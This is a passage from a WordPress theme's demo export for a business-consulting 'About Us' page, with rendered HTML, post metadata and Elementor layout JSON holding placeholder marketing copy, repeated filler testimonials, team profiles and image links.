		<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.</p>		
	        <h6>marketing analysis</h6>			
	        <h6>finance strategy</h6>			
	        <h6>business innovation</h6>			
		        <a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/01.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/02.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/03.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/04.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/05.svg" alt=""></figure></a><a href="http://themeforest.net/user/OceanThemes/portfolio"><figure><img src="https://maxbizz.s3.amazonaws.com/images/06.svg" alt=""></figure></a>		    
	        testimonials	        <h3>What People Say About Us</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi1.png" alt="Oliver Simson">
							<h6>Oliver Simson</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi2.png" alt="Mary Grey">
							<h6>Mary Grey</h6>							client of company						
					“We know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.”
													<img src="https://maxbizz.s3.amazonaws.com/images/testi3.png" alt="Samanta Fox">
							<h6>Samanta Fox</h6>							client of company						
	        our team	        <h3>Our Skilled Leaders</h3>	    
		<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.</p>		
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team1.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team1.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team1-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Monica Black</h6>				chief communication officer			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team2.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team2.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team2-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Perish</h6>				chief business project			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team3.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team3.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team3-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Olivia Woodson</h6>				international consultant			
				<img width="750" height="833" src="https://maxbizz.s3.amazonaws.com/images/team4.jpg" alt="" loading="lazy" srcset="https://maxbizz.s3.amazonaws.com/images/team4.jpg 750w, https://maxbizz.s3.amazonaws.com/images/team4-270x300.jpg 270w" sizes="(max-width: 750px) 100vw, 750px" />								
																		<a rel="nofollow" 
									href="#" style="transition-delay: 0ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 50ms">
																</a>
																								<a rel="nofollow" 
									href="#" style="transition-delay: 100ms">
																</a>
				<h6>Peter Adams</h6>				co-founder of company			
			<a href="http://wpdemo.archiwp.com/maxbizz/our-team">Explore More </a>]]></content:encoded>
		<excerpt:encoded><![CDATA[]]></excerpt:encoded>
		<wp:post_id>487</wp:post_id>
		<wp:post_date><![CDATA[2020-09-07 09:01:54]]></wp:post_date>
		<wp:post_date_gmt><![CDATA[2020-09-07 09:01:54]]></wp:post_date_gmt>
		<wp:comment_status><![CDATA[closed]]></wp:comment_status>
		<wp:ping_status><![CDATA[closed]]></wp:ping_status>
		<wp:post_name><![CDATA[about-us]]></wp:post_name>
		<wp:status><![CDATA[publish]]></wp:status>
		<wp:post_parent>0</wp:post_parent>
		<wp:menu_order>0</wp:menu_order>
		<wp:post_type><![CDATA[page]]></wp:post_type>
		<wp:post_password><![CDATA[]]></wp:post_password>
		<wp:is_sticky>0</wp:is_sticky>
														<wp:postmeta>
		<wp:meta_key><![CDATA[_edit_last]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[page_layout]]></wp:meta_key>
		<wp:meta_value><![CDATA[full-content]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_switch]]></wp:meta_key>
		<wp:meta_value><![CDATA[1]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[is_trans]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[slide_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[rs_page_bg_color]]></wp:meta_key>
		<wp:meta_value><![CDATA[#ffffff]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[pheader_bg_image]]></wp:meta_key>
		<wp:meta_value><![CDATA[489]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_edit_mode]]></wp:meta_key>
		<wp:meta_value><![CDATA[builder]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_template_type]]></wp:meta_key>
		<wp:meta_value><![CDATA[wp-page]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_version]]></wp:meta_key>
		<wp:meta_value><![CDATA[3.0.15]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_wp_page_template]]></wp:meta_key>
		<wp:meta_value><![CDATA[default]]></wp:meta_value>
		</wp:postmeta>
							<wp:postmeta>
		<wp:meta_key><![CDATA[_elementor_data]]></wp:meta_key>
		<wp:meta_value><![CDATA[[{"id":"aeaf1cb","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","padding":{"unit":"px","top":"120","right":"0","bottom":"115","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"e209ac4","elType":"column","settings":{"_column_size":50,"_inline_size":50,"_inline_size_tablet":100},"elements":[{"id":"34ca8c4","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image1-about-us.jpg","id":491},"image_size":"full","align":"left","width_tablet":{"unit":"%","size":100,"sizes":[]},"_margin":{"unit":"px","top":"0","right":"-60","bottom":"0","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false},"_margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"_box_shadow_box_shadow_type":"yes","_box_shadow_box_shadow":{"horizontal":0,"vertical":0,"blur":30,"spread":0,"color":"rgba(0, 0, 0, 0.12)"}},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"1feb286","elType":"column","settings":{"_column_size":50,"_inline_size":50,"_inline_size_tablet":100,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"100","isLinked":false},"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"841e06b","elType":"widget","settings":{"sub":"about company","title":"Make Digital Marketing  Work For Your Business","header_size":"h3","_padding":{"unit":"px","top":"0","right":"0","bottom":"24","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"bb4f4ed","elType":"widget","settings":{"editor":"<p>Our clients\u2019 needs are constantly changing, so we continually seek new and better ways to serve them. To do this, we are bringing new talent into the firm, acquiring new companies, and developing new capabilities, for example, in design.<\/p><hr \/><p>We serve clients at every level of their organization, whether as a trusted advisor to top management or as a hands-on coach.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"983ee34","elType":"section","settings":{"layout":"full_width","gap":"no","structure":"20"},"elements":[{"id":"3d77923","elType":"column","settings":{"_column_size":50,"_inline_size":null,"border_border":"solid","border_width":{"unit":"px","top":"0","right":"1","bottom":"0","left":"0","isLinked":false},"border_width_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":true},"border_color":"#00000026"},"elements":[{"id":"0f29b46","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/signature-home2.png","id":1430},"image_size":"full","align":"left","align_tablet":"right","align_mobile":"left","_padding_tablet":{"unit":"px","top":"0","right":"35","bottom":"0","left":"0","isLinked":false},"_padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false}},"elements":[],"widgetType":"image"}],"isInner":true},{"id":"02cefd4","elType":"column","settings":{"_column_size":50,"_inline_size":null,"margin":{"unit":"px","top":"0","right":"0","bottom":"0","left":"30","isLinked":false},"margin_mobile":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false}},"elements":[{"id":"d2c189c","elType":"widget","settings":{"title":"Peter Adams","header_size":"h6","typography_font_family":"Roboto","typography_font_weight":"600"},"elements":[],"widgetType":"heading"},{"id":"4146a85","elType":"widget","settings":{"editor":"<p>co-founder of company<\/p>","text_color":"#878787","typography_typography":"custom","typography_font_family":"Raleway","typography_font_size":{"unit":"px","size":14,"sizes":[]},"typography_font_weight":"500","typography_text_transform":"uppercase"},"elements":[],"widgetType":"text-editor"}],"isInner":true}],"isInner":true}],"isInner":false}],"isInner":false},{"id":"6af12be","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"112","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"9865002","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"0c75221","elType":"widget","settings":{"title":"Trusted <br>Clients","number":"350","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Amiri","number_typography_font_size":{"unit":"px","size":56,"sizes":[]},"number_typography_font_weight":"bold","title_typography_font_family":"Inter","title_typography_font_weight":"500"},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"4efe597","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"3976936","elType":"widget","settings":{"title":"Finished <br>Projects","number":"215","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Amiri","number_typography_font_size":{"unit":"px","size":56,"sizes":[]},"title_typography_font_family":"Inter","title_typography_font_weight":"500"},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"7d86b75","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"75279d9","elType":"widget","settings":{"title":"Years of <br>Experience","number":"15","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Amiri","number_typography_font_size":{"unit":"px","size":56,"sizes":[]},"title_typography_font_family":"Inter","title_typography_font_weight":"500"},"elements":[],"widgetType":"icounter"}],"isInner":false},{"id":"7c9f8c9","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50,"_inline_size_mobile":50},"elements":[{"id":"5e295b7","elType":"widget","settings":{"title":"Visited<br>Conferences","number":"36","number_typography_typography":"custom","number_typography_font_size_mobile":{"unit":"px","size":36,"sizes":[]},"title_space_mobile":{"unit":"px","size":10,"sizes":[]},"title_typography_typography":"custom","title_typography_font_size_mobile":{"unit":"px","size":12,"sizes":[]},"number_typography_font_family":"Amiri","number_typography_font_size":{"unit":"px","size":56,"sizes":[]},"title_typography_font_family":"Inter","title_typography_font_weight":"500"},"elements":[],"widgetType":"icounter"}],"isInner":false}],"isInner":false},{"id":"07bb3a8","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg1-about-us.jpg","id":504},"background_position":"top center","background_repeat":"no-repeat","padding":{"unit":"px","top":"115","right":"0","bottom":"66","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"80","left":"0","isLinked":false}},"elements":[{"id":"9fed965","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"d2ab48f","elType":"section","settings":{"gap":"extended","structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"44","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"ad3790a","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"ca838f8","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"ba65ecc","elType":"widget","settings":{"sub":"what we do","title":"Creating Your Startup Business","header_size":"h3","align":"center","title_color":"#FFFFFF","_padding":{"unit":"px","top":"0","right":"0","bottom":"23","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"260733b","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center","text_color":"#FFFFFF"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"bdb7238","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"658246c","elType":"widget","settings":{"image_boxes":[{"_id":"e6758bb","image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features1-about-us.jpg","id":501},"title_box":"Accounting & Finance","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""}},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features2-about-us.jpg","id":502},"title_box":"Management Skills","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"112b6ab"},{"image_box":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/features3-about-us.jpg","id":503},"title_box":"Business Planning","content_box":"A great corporate strategy combines five elements: a bold yet realistic ambition, a carefully considered portfolio.","link_box":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"_id":"8732ef5"}],"label_link":"Explore More","box_bg":"#FFFFFF","_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[],"widgetType":"iiboxcarousel"}],"isInner":false}],"isInner":false},{"id":"edf75b3","elType":"section","settings":{"gap":"extended","content_position":"middle","structure":"20","reverse_order_tablet":"reverse-tablet","reverse_order_mobile":"reverse-mobile"},"elements":[{"id":"dda17b7","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100},"elements":[{"id":"1b3917e","elType":"widget","settings":{"image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/image2-about-us.png","id":508},"image_size":"full"},"elements":[],"widgetType":"image"}],"isInner":false},{"id":"3490ca0","elType":"column","settings":{"_column_size":50,"_inline_size":null,"_inline_size_tablet":100,"margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false}},"elements":[{"id":"8df0dd7","elType":"widget","settings":{"sub":"main principles","title":"Global Reach with Local  Understanding","header_size":"h3","_margin":{"unit":"px","top":"-70","right":"0","bottom":"0","left":"0","isLinked":false},"_margin_tablet":{"unit":"px","top":"0","right":"0","bottom":"0","left":"0","isLinked":false},"_padding":{"unit":"px","top":"0","right":"0","bottom":"22","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"9bcd87a","elType":"widget","settings":{"editor":"<p>In healthy companies, changing directions or launching new projects means combining underlying strengths and capacities with new.<\/p>","_padding":{"unit":"px","top":"0","right":"0","bottom":"35","left":"0","isLinked":false}},"elements":[],"widgetType":"text-editor"},{"id":"a428896","elType":"widget","settings":{"title":"marketing analysis","percent":{"unit":"%","size":60,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"17","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"lbar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"},{"id":"2c76de7","elType":"widget","settings":{"title":"finance strategy","percent":{"unit":"%","size":80,"sizes":[]},"_padding":{"unit":"px","top":"0","right":"0","bottom":"17","left":"0","isLinked":false},"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"lbar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"},{"id":"2e8f3f7","elType":"widget","settings":{"title":"business innovation","percent":{"unit":"%","size":58,"sizes":[]},"lbar_color":"#4B83FC"},"elements":[],"widgetType":"iprogress"}],"isInner":false}],"isInner":false},{"id":"d0493f4","elType":"section","settings":{"background_background":"classic","background_color":"#262832","padding":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"bfd67a8","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"829ba7d","elType":"widget","settings":{"image_carousel":[{"_id":"46a0442","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/01.svg","id":510},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"24adf3d","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/02.svg","id":511},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"_id":"90b7ac2","title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/03.svg","id":512},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""}},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/04.svg","id":513},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"cb5bb18"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/05.svg","id":514},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"e595c69"},{"title":"","image_partner":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/06.svg","id":515},"image_link":{"url":"http:\/\/themeforest.net\/user\/OceanThemes\/portfolio","is_external":"","nofollow":"","custom_attributes":""},"_id":"6fa2f0f"}],"tshow":"6","tshow_tablet":"4","dots":"false","img_spacing":{"unit":"px","size":80,"sizes":[]},"img_css_filters_hover_css_filter":"custom"},"elements":[],"widgetType":"iclogos"}],"isInner":false}],"isInner":false},{"id":"0308eae","elType":"section","settings":{"background_background":"classic","background_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/bg2-about-us.jpg","id":520},"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"175","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"140","left":"0","isLinked":false}},"elements":[{"id":"12b16f2","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"61fb36b","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"e5ca1cb","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"4431150","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"e15f0b3","elType":"widget","settings":{"sub":"testimonials","title":"What People Say About Us","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"dc4d425","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"bec6367","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"324dce4","elType":"widget","settings":{"testi_slider":[{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1709},"tname":"Oliver Simson","tjob":"client of company","_id":"560686e"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"18ebffe"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"25d98b7"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi1.png","id":1709},"tname":"Oliver Simson","tjob":"client of company","_id":"1180cad"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi2.png","id":518},"tname":"Mary Grey","tjob":"client of company","_id":"0f71845"},{"tcontent":"\u201cWe know a diverse workforce and an inclusive culture matters to our clients. Through philanthropy and employee volunteerism, we support the diverse communities where our employees live.\u201d\n\n","timage":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/testi3.png","id":519},"tname":"Samanta Fox","tjob":"client of company","_id":"2d0cde6"}],"tshow":"3","loop":"true"},"elements":[],"widgetType":"itestimonials"}],"isInner":false}],"isInner":false},{"id":"e76f400","elType":"section","settings":{"background_position":"center center","background_repeat":"no-repeat","background_size":"cover","padding":{"unit":"px","top":"120","right":"0","bottom":"110","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"60","right":"0","bottom":"60","left":"0","isLinked":false}},"elements":[{"id":"beac444","elType":"column","settings":{"_column_size":100,"_inline_size":null},"elements":[{"id":"eab9ff6","elType":"section","settings":{"structure":"30","padding":{"unit":"px","top":"0","right":"0","bottom":"40","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"7fb7005","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true},{"id":"b8f3d6d","elType":"column","settings":{"_column_size":33,"_inline_size":57.33200000000000073896444519050419330596923828125,"_inline_size_tablet":80},"elements":[{"id":"532ec06","elType":"widget","settings":{"sub":"our team","title":"Our Skilled Leaders","header_size":"h3","align":"center","_padding":{"unit":"px","top":"0","right":"0","bottom":"20","left":"0","isLinked":false},"stitle_bg":"#4B83FC1A","subtitle_style":"is_highlight"},"elements":[],"widgetType":"iheading"},{"id":"f9af862","elType":"widget","settings":{"editor":"<p>We help you see the world differently, discover opportunities you may never have imagined and achieve results that bridge what is with what can be.<\/p>","align":"center"},"elements":[],"widgetType":"text-editor"}],"isInner":true},{"id":"0e38994","elType":"column","settings":{"_column_size":33,"_inline_size":21,"_inline_size_tablet":10},"elements":[],"isInner":true}],"isInner":true},{"id":"9a95313","elType":"section","settings":{"gap":"extended","structure":"40","padding":{"unit":"px","top":"0","right":"0","bottom":"50","left":"0","isLinked":false},"padding_mobile":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"layout":"full_width"},"elements":[{"id":"0b610b3","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"2828095","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team1.jpg","id":524},"member_name":"Monica Black","member_extra":"chief communication officer","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"c25c0ad","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"f09ab14","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team2.jpg","id":525},"member_name":"Peter Perish","member_extra":"chief business project","social_share":[{"title":"Pinterest","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-pinterest-p","library":"fa-brand"},"_id":"a5da75d"},{"title":"Facebook","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-facebook-f","library":"fa-brand"},"_id":"837324c"},{"title":"Twitter","social_link":{"url":"#","is_external":"","nofollow":"","custom_attributes":""},"social_icon":{"value":"fab fa-twitter","library":"fa-brand"},"_id":"cbcc844"}],"_padding_tablet":{"unit":"px","top":"0","right":"0","bottom":"30","left":"0","isLinked":false},"title_typography_typography":"custom","title_typography_font_size":{"unit":"px","size":24,"sizes":[]},"job_typography_font_size":{"unit":"px","size":14,"sizes":[]}},"elements":[],"widgetType":"imember"}],"isInner":true},{"id":"ec58039","elType":"column","settings":{"_column_size":25,"_inline_size":null,"_inline_size_tablet":50},"elements":[{"id":"e65282d","elType":"widget","settings":{"member_image":{"url":"https:\/\/maxbizz.s3.amazonaws.com\/images\/team3.jpg","id":526},"member_name":"Olivia Woodson","member_extra":"international 